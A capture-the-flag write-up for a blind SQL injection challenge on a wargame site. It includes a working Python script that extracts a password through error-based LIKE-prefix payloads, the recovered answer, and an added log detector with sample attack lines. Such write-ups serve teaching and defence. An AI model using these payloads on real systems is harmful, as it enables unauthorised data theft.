# frankenstein

This is the initial screen.

![](/files/-M-TttNvqV_Av8Dq5dWL)

I recognized this as an error-based blind SQL injection challenge and solved it that way.

The Python code for it is shown below.

```python
import requests
import string

URL = 'https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw='
PHPSESSID = 'MY_PHPSESSID'
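# Marker that appears in the response body when the injected expression raises a SQL error
TRUE_PHRASE = '<br>error'


def query(payload):
    """Send one payload and report whether the response contains the error marker."""
    cookies = {'PHPSESSID': PHPSESSID}
    r = requests.get(URL + payload, cookies=cookies)
    content = r.text
    return TRUE_PHRASE in content


# 0dc4efbb
def find_pw():
    pw = ''
    while True:
        found = False
        for character in string.printable:
            # Skip URL delimiters, the quote, and the LIKE wildcards (% and _).
            # When the LIKE prefix matches, 9999999999*9999999999 overflows the
            # integer range and raises a SQL error; otherwise the CASE yields 0.
            if character in "#%&'_":
                continue
            elif query("' or case when id='admin' and pw like '{}{}%25' then 9999999999*9999999999 else 0 end%23".format(pw, character)):
                pw += character
                found = True
                break
        # No character extended the prefix, so the full value has been recovered.
        if not found:
            break
    print('pw: {}'.format(pw))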


find_pw()
```

Running the script shows that pw is `0dc4efbb`.

Visiting <https://los.rubiya.kr/chall/frankenstein_b5bab23e64777e1756174ad33f14b5db.php?pw=0dc4efbb> solves the challenge.

![](/files/-M-hsXjqAfeLjvEecfPk)
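From the defender's side, the script above leaves a distinctive trail in the access log: the same client sends many requests whose `LIKE 'prefix%'` value grows one character at a time. The following is an added example, not part of the original write-up, that flags this pattern. The log layout, IP addresses, paths, prefixes and the `min_depth` threshold are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log: documentation IPs, made-up paths and prefixes.
_PROBE = ('198.51.100.7 "GET /item.php?pw=%27+or+case+when+pw+like+%27{}%25%27'
          '+then+9999999999*9999999999+else+0+end%23 HTTP/1.1" 200')
SAMPLE_LOG = "\n".join(
    [_PROBE.format(p) for p in ("a", "b", "c", "ca", "cb", "cb0")]
    + ['192.0.2.10 "GET /search.php?q=i+like+%27tea%25%27 HTTP/1.1" 200',
       '192.0.2.10 "GET /search.php?q=shoes HTTP/1.1" 200'])

LINE_RE = re.compile(r'^(\S+) "GET (\S+) HTTP/')       # assumed log layout
LIKE_RE = re.compile(r"like\s+'([^'%]*)%'", re.I)      # LIKE 'prefix%'


def like_prefixes(log_text):
    """Map client IP -> LIKE prefixes found in URL-decoded query parameters."""
    seen = defaultdict(list)
    for line in log_text.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue
        ip, target = m.groups()
        for values in parse_qs(urlsplit(target).query).values():
            for value in values:
                seen[ip].extend(LIKE_RE.findall(value))
    return seen


def chain_depth(prefixes):
    """Longest chain in which each prefix extends another seen prefix by one char."""
    depth = {}
    for p in sorted(set(prefixes), key=len):
        if p:
            depth[p] = depth.get(p[:-1], 0) + 1
    return max(depth.values(), default=0)


def detect(log_text, min_depth=3):
    """Return client IPs whose requests grow a LIKE prefix step by step."""
    return sorted(ip for ip, p in like_prefixes(log_text).items()
                  if chain_depth(p) >= min_depth)


if __name__ == "__main__":
    print(detect(SAMPLE_LOG))
```

This only surfaces the probing in logs; binding `pw` as a query parameter instead of concatenating it into the SQL string removes the root cause.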

